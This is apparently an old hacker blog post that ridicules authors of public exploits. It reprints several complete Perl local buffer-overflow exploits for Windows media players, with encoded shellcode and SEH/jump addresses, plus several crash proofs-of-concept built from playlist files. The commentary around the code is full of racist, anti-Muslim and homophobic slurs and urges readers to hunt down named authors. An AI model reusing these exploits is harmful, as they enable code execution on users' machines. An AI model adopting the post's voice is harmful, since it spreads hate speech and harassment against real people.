THE GOBLIN STRIKES BACK

SHIT! SHIT!

The Nut Goblin (ThE g0bL!N) has to be the most retarded of the retards we've fucked with on this blog. He is very stupid. Some say he has a negative IQ. Some say he (or she?? once again) has nuts on his/her forehead at all times. But all know what a dumb mother fucking idiot The Nut Goblin really is.

PUNT! PUNT!

Exhibit A-Z:

A perfectly normal exploit.. almost ruined!

#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
###################################################################
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
###################################################################
my $overflow="\x41" x 4128;
my $jmp="\x6F\xBA\x2D\x15";# Universal
my $nop="\x90" x 20;
###################################################################
open(myfile,'>> ahwak2000.wav');
print myfile $overflow.$jmp.$nop.$shellcode;
###################################################################

Perfectly fine. JMP to mother fucking code. Now, The cum gobliner has to gay it all up with...

#!/usr/bin/perl
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player 1.0.0.2(wav)  local  Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> dz.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################

Even the fags at milw0rm got it wrong...

"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)" --> ITS NOT SEH FUCKUP.

You see a fucking JMP 0xXX anywhere? Debug something every once in a fucking blue moon moron.

So, milw0rm is dumb and the goblin gobbles str0ke's nuts, and they both claim it as SEH we assume ahahahahahahaahhahaa!!!!

A BIT OF POW FROM THE opt!x hacker

Main Critism: You stupid kiddie fucks still won't give up
this one is coming in from an external resource!!!!!!!!!

these lamers cant even make there xploit work
#!/usr/bin/perl
#[+] software : MediaCoder 0.7.1.4488 (.lst & .m3u) Universal Buffer overflow (SEH)
#[+] Author : opt!x hacker
#[+] greetz to germaya_x because he finds an exploit in MediaCoder 0.7.1.4486
#[+] download :http://www.mediacoderhq.com/dlfull.htm
#[+] tested under: SP2 (FR)
##########################################################

# windows/exec - 153 bytes
# Encoder: x86/jmp_call_additive
# EXITFUNC=seh, CMD=notepad.exe
my $shellcode=
"\xfc\xeb\x11\x5e\xbf\x5c\xae\xcd\xea\x56\x31\x3e\xad\x01" .
"\xc7\x85\xc0\x75\xf7\xc3\xe8\xea\xff\xff\xff\xa0\x46\x89" .
"\xea\x58\x97\x99\xae\x64\x1c\xe1\x35\xec\x23\xf5\xbd\x43" .
"\x3c\x82\x9d\x7b\x3d\x7f\x68\xf0\x09\xf4\x6a\xe8\x43\xca" .
"\xf4\x58\x27\x0a\x72\xa7\xe9\x41\x76\xa6\x2b\xbe\x7d\x93" .
"\xff\x65\x7a\x96\x1a\xee\xdd\x7c\xe4\x1a\x87\xf7\xea\x97" .
"\xc3\x58\xef\x26\x3f\xed\x13\xa2\xbe\x1a\xa2\xe8\xe4\xd8" .
"\x76\x4f\xd4\x16\x18\x26\x72\x5d\x9f\xf6\xf1\x21\x2c\x7c" .
"\x75\xbd\x81\x09\x1e\xb5\x50\xf5\x5c\x05\x08\x56\x0b\x75" .
"\x47\x52\x94\x1d\xc0\xa5\xa0\xd3\xa7\xa6\x52\x85\x28\x2d" .
"\xf8\x29\xd6\xa9\x2c\xac\x60\x57\x31\x2e\x91\x97\x31";


my $junk="\x41" x 775;
my $next_seh1="\x10\x00\xF3\xA2"; # call esp in mcres.dll = 0x1000F3A2
my $seh="\x31\x66\x66\x31"; # pop pop ret->mediacoder.exe
open(myfile,'>>mediacoder.lst');
print myfile $junk.$next_seh1.$seh.$shellcode;

my $next_seh2="\x87\x51\x37\x00"; # jmp esp in sdl.dll
open(myfile,'>>mediacoder.m3u');
print myfile $junk.$next_seh2.$seh.$shellcode;

# milw0rm.com [2009-08-07]

look at thiz xploit you can see it wont work. OPT!X 31337 HACKER wont even code the sh!t properly. everyone who thinks is resembles a UNIVERSAL xploit look at this line
my $next_seh2="\x87\x51\x37\x00"; # jmp esp in sdl.dll

asnother 1
#!/usr/bin/perl
#soft: jetAudio v 7.1.9.4030 plus vx (.m3u ) universal buffer Overflow exploit (SEH)
#based on: HACK4LOVE (http://www.milw0rm.com/exploits/9359)
#exploited by: germaya_x
tested on: xp sp3 (EN)
#bug date: August 05 09
#greetz: hack4love
###############################################################################################
my $header = "http://";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
my $bof="\x41" x 1017;
my $eip="\xeb\x06\x90\x90";
my $eip_next="\x87\xC2\x6C\x00"; #jmp esp in jdl_ximage.dll (uni address)
my $nop="\x90" x 10;

################################################################################################
open(MYFILE,'>>exploit.m3u');
print MYFILE $header.$bof.$eip_next.$nop.$shellcode;
close(MYFILE);
################################################################################################

# milw0rm.com [2009-08-06]

xploit wont work either hack4c0ck

FUCKING NOOBS GO AWAY STOP POSTING STUPID CODE and all you lame fucks need to get off His0k4s dick

A DOUBLE ACTION FEATURE FROM THE GOBLIN

Main Critism: Do I even have to analyse this shit? IT IS SHIT, YOU CAN SEE THAT.

I will refer to we and I and I as we.

 #!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   M3U/M3L to ASX/WPL v1.1  (asx,m3u,m3l) Local Stack Overflow POC          ##
# #  Download: http://proletsoft.freeservers.com/mmb/m3utoasx.html             ##
## Welcom Back Milw0rm                                                         ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');#asx,m3u,m3l)
print myfile $crash;
##################################################################################
#By ThE g0bL!N
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################

# milw0rm.com [2009-07-11]

watttttttttttttttttttttttttttttttttt??????????????????

 #!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   Playlistmaker v1.5   (.M3U/M3L/Txt File) Local Stack Overflow POC        ##
# #  Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html        ##
## Welcom Back Milw0rm                                                         ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');# M3U/M3L/Txt
print myfile $crash;
##################################################################################
#By ThE g0bL!N
#Usgae:open existing Plylis => Poc.m3u => Click On file => Boom!!!
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################

# milw0rm.com [2009-07-11]

Now that your eye balls are offically bleeeeeeeeeding.. its time to take a time out.

Gobble on dese ballz goblin!

Go hunt down these idiots. I'm no fucking racists, but lets burn the towels on their heads. Everybody knows the muslim script kiddies are even worst than the .ro fags now.

We are now calling on the toothless bitches that these yellow shitting asswipes call their mothers to spank them and ground them from teh interwebz for at least 60 days. During the 60 day period, interwebz access will be restricted to emailing their favorite rappers and compiling exploits remotely via GCC_SERVER. Nothing will stop these dumbasses as we can tell, so theres nothing stopping us from blogging about the dumb shit that they do. Rely on ignorance, spread intelligence.

BRING BACK MITNICK!!!

OtsAv TV [.olf] Local Heap Overflow Poc

Main Critism: Ok, I'm only gonna post 1/3 "Heap Overflow PoCs".. trust in us, the rest are just as gay.

#!/usr/bin/perl
# OtsAv TV [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/tv/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >>  Import List   >> As playlist  >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 00009AF0
# EDX 03A0F730
# EBX 0000042A
# ESP 03A0F9C8
# EBP 00000000
# ESI 02CD7102
# EDI 03A0FEAA
# EIP 0043C8D7 OtsAVTVt.0043C8D7
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;
---------------------

Wow, that a total retard. "UMMM let meee post dis shiz un seee f s0m3b0dy cun XPLOIT it fer me!!!" --> Really, is that the login you want owning your servers? Is that the kind of moron you listen to but can't understand when you call major technical support hotlines? Will somebody pleaseeee shave this girl's head and sell her back to pre-school or towelhead/dish rag/mop bucket/broom head/microshit education institutes? WOAHHHHHHHHHHHHHH LIKE YEAH D00DZ

PatPlayer v3.9 (M3U File) Local Heap Overflow PoC

Main critism: You stupid kiddie fucks just won't give up. I hate you more than the new milw0rm owners. Since when is Citrix bug a web bug??

#!/usr/bin/perl
#
#
#
# PatPlayer v3.9 (M3U File) Local Heap Overflow PoC
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Greatz : All friends (Jiko :)) Sec-r1z.CoM ..... IQ-TY ....
#
#
#EAX 41414141
#ECX 00000000
#EDX 004F1FC0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#EBX 00B928DC
#ESP 0012FD2C
#EBP 0012FD78
#ESI 004F1CCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 004EEA78 PatPlaye.004EEA78
#EIP 00404C59 PatPlaye.00404C59
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 2480; # Random

open(MYFILE,'>>cyber.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

Paaaaaaaaaaaaaaaathetic.

PS. Cyber-Zone nicknamed himself that when he got "In Da Zone" when Cybering with an alaskan huskie. Go figure.

More Lame Shit To Have A Go At

Incase you thought we were dead.. or finished.. you thought wrong. We thought wrong. A job done well is never finished we suppose.. and we're back because so goat humping queer decided to jack up some more perl exploit bullshit... yeah, we'd love for a llama to fart on his face too.

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   PEamp 1.02b  (.M3U File) Local Stack Overflow POC                        ##
# #  Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip    ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)

h4rh4rh4r Boom !!! like lulz like it crashed my blue screen lulz

DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs

Main critism: SINCE WHEN DID A FUCKING CRASH BECOME A SECURITY BUG?

#####################################################################################################
#                    DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

#####################################################################################################
#                    DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3l";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

Somebody obviously gave this bitch turrets when she was too young. She plays with dolls and playlists all day long. I speak for all Canadians by saying, "GO FUCK YOURSELF"